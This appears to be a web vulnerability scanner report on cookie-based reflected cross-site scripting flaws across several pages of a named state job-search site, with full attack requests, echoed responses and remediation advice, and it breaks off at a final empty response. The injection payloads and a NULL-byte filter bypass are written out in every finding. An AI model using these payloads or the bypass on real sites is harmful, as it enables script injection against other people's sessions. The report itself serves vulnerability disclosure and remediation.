HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:21:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endecca"><img src=a onerror=alert(1)>0dfd472147"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2e6"%3balert(1)//f30b745f3f1 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 2e2e6";alert(1)//f30b745f3f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ada/mn_quicksearch_dsp.cfm?type=e&choice=1 HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en2e2e6"%3balert(1)//f30b745f3f1; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:22:15 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN2E2E6";ALERT(1)//F30B745F3F1\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as ad224"><img src=a onerror=alert(1)>cde72d257de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enad224"><img%20src%3da%20onerror%3dalert(1)>cde72d257de; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:14:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="enad224"><img src=a onerror=alert(1)>cde72d257de"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 7e15f"><img src=a onerror=alert(1)>0848adce34d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en7e15f"><img%20src%3da%20onerror%3dalert(1)>0848adce34d; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:15:53'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en7e15f"><img src=a onerror=alert(1)>0848adce34d"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87b2f"%3balert(1)//9062e32d47a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 87b2f";alert(1)//9062e32d47a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en87b2f"%3balert(1)//9062e32d47a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:16:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:16:08'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN87B2F";ALERT(1)//9062E32D47A\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ecf6"%3balert(1)//f0243477b7 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 6ecf6";alert(1)//f0243477b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en6ecf6"%3balert(1)//f0243477b7; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:15:06 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:15:05'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN6ECF6";ALERT(1)//F0243477B7\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8fd5"%3balert(1)//c5a2f006eb8 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as b8fd5";alert(1)//c5a2f006eb8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=enb8fd5"%3balert(1)//c5a2f006eb8; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//ENB8FD5";ALERT(1)//C5A2F006EB8\"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as dab86"><img src=a onerror=alert(1)>4a24dd4153a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ada/mn_settings_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=endab86"><img%20src%3da%20onerror%3dalert(1)>4a24dd4153a; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:47 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="endab86"><img src=a onerror=alert(1)>4a24dd4153a"> ...[SNIP]...
The value of the SYSTRANLANGUAGE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e5b"%3balert(1)//093651f14f0 was submitted in the SYSTRANLANGUAGE cookie. This input was echoed as 54e5b";alert(1)//093651f14f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ada/mn_ssncheck.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en54e5b"%3balert(1)//093651f14f0; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
